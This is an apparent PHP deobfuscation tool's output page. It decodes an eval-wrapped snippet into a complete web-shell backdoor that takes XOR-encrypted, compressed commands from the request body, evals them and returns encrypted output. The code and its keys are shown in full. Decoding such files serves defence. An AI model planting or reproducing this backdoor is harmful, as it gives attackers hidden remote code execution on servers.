Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval('$k="098f6bcd";$kh="4621d373cade";$kf="4e832627b4f6";$p="0lvMBtE2eTCBw6aY"; ..

Decoded Output download


function x($t,$k){ 
$c=strlen($k);$l=strlen($t);$o=""; 
for($i=0;$i<$l;){ 
for($j=0;($j<$c&&$i<$l);$j++,$i++) 
{ 
$o.=$t[$i]^$k[$j]; 
} 
} 
return $o; 
}$k="098f6bcd";$kh="4621d373cade";$kf="4e832627b4f6";$p="0lvMBtE2eTCBw6aY"; 
 
function x($t,$k){ 
$c=strlen($k);$l=strlen($t);$o=""; 
for($i=0;$i<$l;){ 
for($j=0;($j<$c&&$i<$l);$j++,$i++) 
{ 
$o.=$t[$i]^$k[$j]; 
} 
} 
return $o; 
} 
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) { 
@ob_start(); 
eval(@gzuncompress(@x(base64_decode($m[1]),$k))); 
$o=@ob_get_contents(); 
@ob_end_clean(); 
$r=@base64_encode(@x(@gzcompress($o),$k)); 
print("$p$kh$r$kf"); 
}

Did this file decode correctly?

Original Code

<?php
eval('$k="098f6bcd";$kh="4621d373cade";$kf="4e832627b4f6";$p="0lvMBtE2eTCBw6aY";

function x($t,$k){
$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t[$i]^$k[$j];
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}');

Function Calls

preg_match 1
file_get_contents 1

Variables

$k 098f6bcd
$p 0lvMBtE2eTCBw6aY
$kf 4e832627b4f6
$kh 4621d373cade

Stats

MD5 e94195650c2e621defbcecb27ffc438c
Eval Count 1
Decode Time 289 ms